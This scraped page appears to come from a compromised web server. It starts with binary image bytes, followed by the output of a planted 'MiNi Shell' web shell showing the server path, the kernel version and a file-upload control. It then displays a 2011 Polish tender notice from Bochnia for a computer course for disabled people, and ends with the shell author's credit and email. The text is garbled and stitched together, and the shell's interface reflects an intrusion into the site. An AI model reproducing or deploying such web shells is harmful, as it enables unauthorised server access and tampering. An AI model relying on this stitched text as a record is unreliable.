JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111010/327662-N-2011.html

<p class="kh_header"><b>Bochnia: Zorganizowanie integracyjnego kursu komputerowego dla osób niepełnosprawnych uczestników projektu i ich otoczenia w ramach  projektu pn. Wzmacnianie integracji społecznej w Powiecie  Bocheńskim</b><br>
<b>Numer ogłoszenia: 327662 - 2011; data zamieszczenia: 10.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.bochnia.pl  na BIP PCPR</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie integracyjnego kursu komputerowego dla osób niepełnosprawnych uczestników projektu i ich otoczenia w ramach  projektu pn. Wzmacnianie integracji społecznej w Powiecie  Bocheńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie integracyjnego kursu komputerowego dla 20 osób w tym 16 osób niepełnosprawnych i 4 opiekunów w ramach projektu pt. Wzmacnianie integracji społecznej Powiecie Bocheńskim. 
Uczestnikami będą osoby niepełnosprawne w stopniu znacznym lub umiarkowanym z powodu dysfunkcji narządu ruchu w tym osoby poruszające się przy pomocy kul i balkoniku, osoby z chorobami neurologicznymi oraz osoby chorujące psychiczne i aktualnie zdolne do uczestnictwa w kursie oraz 6 osób z dysfunkcją narządu słuchu w tym osoby słabo słyszące i głuche. 
Wśród uczestników kursu będą osoby, u których stwierdzono brak umiejętności posługiwania się komputerem lub niski poziom kompetencji w zakresie posługiwania się komputerem oraz Internetem. Dodatkowo osoby te charakteryzuje niski poziom samooceny, niskie poczucie własnej wartości oraz niska aktywność społeczna. W zajęciach będą uczestniczyć osoby sprawne będące opiekunami kierowanych osób niepełnosprawnych. 
Celem organizacji integracyjnego kursu komputerowego jest dążenie do poprawy kompetencji społecznych uczestników poprzez m.in. opanowanie technik informatycznych i stworzenie warunków do wspólnego przebywania i interakcji w grupie uczestników, tworzenie szans dla zaistnienia spójności w grupie a dla indywidualnych członków tej grupy celem jest nabycie przydatnych umiejętności interpersonalnych komunikowania się, autoprezentacji, budowanie wiary we własne możliwości i testowanie własnych kompetencji społecznych. Program kursu i organizacja zajęć powinna wpływać korzystnie na proces komunikacji w grupie uczestników, na zwiększenie poczucia bezpieczeństwa członków grupy, powinna stwarzać uczestnikom możliwość współdziałania oraz okazję do zdobywania wiedzy z zakresu technik informatycznych. Program kursu powinien w szczególności gwarantować uczestnikom poznanie zasad funkcjonowania komputera i opanowanie niezbędnych umiejętności obsługi, w tym Internetu.
Forma kursu powinna zakładać współpracę w grupie podczas wykonywania ćwiczeń informatycznych. 
Program kursu w zakresie technik informatycznych powinien zawierać co najmniej: 
1.Naukę podstawowych umiejętności:
a.Uruchamianie, wyłączanie, obsługa myszki, klawiatury i monitora 
b.Graficzny interfejs użytkownika
c.Systemu operacyjny Microsoft Windows 
d.Podstawowe parametry sprzętu i oprogramowania, konfiguracja 
e.System plików. Atrybuty plików i folderów, wyszukiwanie.
f.Kompresowanie i archiwizowanie danych
g.Wirusy komputerowe, zabezpieczenie danych 
2.Tworzenie pism - nauka obsługi edytora tekstu MS Word
a.Praca z edytorem tekstu, podstawowe operacje, pomoc programu
b.Ustawienia dokumentu, zapisywanie efektów pracy.
c.Formatowanie tekstu, ustawienia akapitów, style
d.Tworzenie i edycja tabel.
e.Wstawianie i edycja obiektów graficznych
f.Drukowanie dokumentów
3.Tworzenie tabel-nauka obsługi arkuszy kalkulacyjnych MS Excel
a.Praca z arkuszem kalkulacyjnym, omówienie podstawowych operacji, pomoc programu. Wprowadzanie danych, zapisywanie efektów pracy, formaty plików.
b.Formatowanie zawartości i wyglądu komórek, wierszy i kolumn.
c.Formuły i funkcje arkusza kalkulacyjnego.
d.Ustawienia skoroszytu, arkusza i przygotowanie do drukowania
4.Naukę korzystania z Internetu
a.Podstawowe pojęcia związane z Internetem, budowa i działanie sieci komputerowych
Rodzaje i zasady korzystania z zasobów sieciowych
b.Praca z przeglądarka internetową
c.Możliwości i sposoby wykorzystania zasobów Internetu
d.Wyszukiwanie i gromadzenie informacji
e.Bezpieczne korzystanie z sieci, zagrożenia ze strony Internetu
f.Rodzaje i sposoby komunikacji w sieci, wykorzystywane oprogramowanie
g.Poczta elektroniczna i jej zastosowania 
h.Sposoby dostępu do poczty elektronicznej, bezpieczeństwo poczty elektronicznej
i.Tworzenie, wysyłanie i odbieranie wiadomości, korzystanie z załączników, drukowanie wiadomości
j.Komunikatory internetowe, zakładanie kont, komunikacja, itp..
Program kursu w zakresie kompetencji interpersonalnych powinien zawierać co najmniej:
- nabycie lub podniesienie poziomu umiejętności interpersonalnych komunikowania się, autoprezentacji, 
- budowanie wiary we własne możliwości i testowanie własnych kompetencji społecznych przez uczestników kursu,
- budowanie poczucia bezpieczeństwa członków grupy w czasie zajęć.
Prowadzący kurs powinien dążyć do zaspokojenia indywidualnych potrzeb uczestników kursu,a zwłaszcza potrzeby uznania i aprobaty. Prowadząc zajęcia należy uwzględnić, że jego uczestnikami będą też osoby po raz pierwszy pracujące z komputerem,  dlatego tempo pracy i przekazywana treść muszą być dostosowane do potrzeb i możliwości poszczególnych uczestników.
Należy przewidywać, że udział w kursie osób niesłyszących może być utrudniony przez zewnętrzne czynniki. Osoby niesłyszące i słabo słyszące muszą pokonywać bariery komunikacyjne, w postaci podejmowania prób nawiązania kontaktu z osobami słyszącymi. Zamawiający zapewni na czas zajęć usługi tłumacza języka migowego.
Miejsce prowadzenia kursu musi być dostosowane do stopnia sprawności uczestników.            
W programie kursu integracyjnego należy uwzględnić 2-godzinne warsztaty pedagogiczne lub psychologiczne na temat zasad prezentacji własnej osoby w grupie oraz zasad budowania adekwatnej samooceny i poczucia własnej wartości u uczestników kursu.
 
Czas trwania kursu: 
30 godzin zegarowych. Zajęcia powinny odbywać się w soboty w wymiarze 6-7 godzin zegarowych. Termin realizacji kursu do 15.12.2011r. 

Uczestnikom kursu należy zapewnić:
-warunki adekwatne do zaplanowanych zajęć uwzględniając zasady BHP
-sala powinna być dostosowana do potrzeb osób niepełnosprawnych z dysfunkcjami narządu ruchu oraz powinna być wyposażona w stanowiska komputerowe tj. jedno stanowisko dla co najwyżej dwóch uczestników kursu.
-w programie kursu należy zapewnić przerwę regeneracyjną w tym wydanie dania ciepłego oraz napojów ciepłych i zimnych. 
-miejsce szkolenia powinno znajdować się na terenie Bochni ze względu na sieć komunikacji publicznej  i niepełnosprawność osób uczestniczących w integracyjnym kursie. 
-wykonawca powinien wyposażyć każdego uczestnika szkolenia w niezbędne materiały szkoleniowe zgodnie z programem kursu oraz w materiały biurowe i piśmienne.

Oferent będzie zobowiązany do przedstawienia harmonogramu kursu, z uwzględnieniem  zakresu rodzajów i tematów zajęć, czasu ich trwania, liczby godzin zegarowych oraz wskazania kwalifikacji osób prowadzących zajęcia w każdym dniu. Prowadzący zajęcia z technik informatycznych powinien posiadać wykształcenie informatyczne oraz przygotowanie pedagogiczne. Warsztaty psychologiczno-pedagogiczne powinny być prowadzone przez uprawnionego psychologa lub pedagoga.  

Oczekiwane metody prowadzenia zajęć: 
-prezentacja, 
-wykład, 
-warsztaty 
-ćwiczenia przy komputerze, 
-dyskusja.

Dokumentacja przebiegu kursu:
-dzienna lista obecności
-dziennik zajęć zawierający wymiar godzin oraz temat zajęć
-imienna lista potwierdzająca odbiór materiałów szkoleniowych korzystanie z posiłków
-dokumentacja fotograficzna z każdego dnia zajęć dokumentująca zasadnicze punkty programu

Organizator kursu zobowiązany będzie do oznakowania afiszem promocyjnym miejsca realizacji kursu oraz zamieszczenia w dokumentacji integracyjnego kursu komputerowego informacji o finansowaniu projektu przez Unię Europejską..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do rejestru ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2. wpis do rejestru instytucji szkoleniowych
3. wykonawca powinien posiadać aktualną polisę potwierdzającą posiadanie ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej.

Ocena spełnianie warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób  realizujących zamówienia wraz z opisem  doświadczenia, wykształcenia oraz jaką rolę będą pełnić w realizacji zamówienia.

Ocena spełnianie warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, 
że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału 
w postępowaniu o udzielenie zamówienia albo składania ofert;
b)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega 
z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzające, że uzyskał przewidziane prawem zwolnienie, odroczenie lub układ ratalny dla zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

Ocena spełnianie warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy
2.Oświadczenie Wykonawcy, że Wykonawca spełnia wymogi art. 22 ust. 1 ustawy Prawo zamówień publicznych.
3.Oświadczenie Wykonawcy, że cena oferty obejmuje pełny zakres usługi oraz jest zgodna z wytycznymi SIWZ.
4.Program kursu wraz z harmonogramem zgodny z wymogami określonymi w SWIZ
5.W celu potwierdzenia braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawca składa Oświadczenie o którym mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych.
6.Zaakceptowany wzór umowy 
7.Wzór świadectwa/zaświadczenia jaki otrzyma uczestnik szkolenia
8.Oświadczenie, że szkolenie będzie przeprowadzone w Bochni.
9.Oświadczenie, że szkolenie będzie przeprowadzone w salach wyposażonych w sprzęt komputerowy oraz że sala  szkoleniowa nie stwarza barier w zakresie poruszania się dla osób niepełnosprawnych ruchowo. 
10.	Wykonawca upoważnia Powiatowe Centrum Pomocy Rodzinie w Bochni lub jego upoważnionych przedstawicieli do przeprowadzenia wszelkich badań mających na celu sprawdzenie oświadczeń, dokumentów i przedłożonych informacji oraz do wyjaśnienia finansowych i technicznych aspektów tego zgłoszenia. Dla tych celów Wykonawca upoważnia każdą osobę publiczną, bank lub przedsiębiorstwa wymienione w ofercie do dostarczenia stosownej informacji uznanej przez Powiatowe Centrum Pomocy Rodzinie, za konieczną i wymaganą w celu sprawdzenia oświadczeń i informacji zawartych w ofercie.
11.	Oświadczenie Wykonawcy, że zapoznał się z zakresem zamówienia oraz uzyskał wszelkie niezbędne informacje w celu przygotowania i złożenia oferty z należytą starannością.

Ocena spełnianie warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.bochnia.pl          na BIP PCPR<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe centrum Pomocy Rodzinie w Bochni
ul. E. Windakiewicza 9/5, 
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2011 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochni 
ul. E. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt Wzmacnianie integracji społecznej w Powiecie Bocheńskim współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com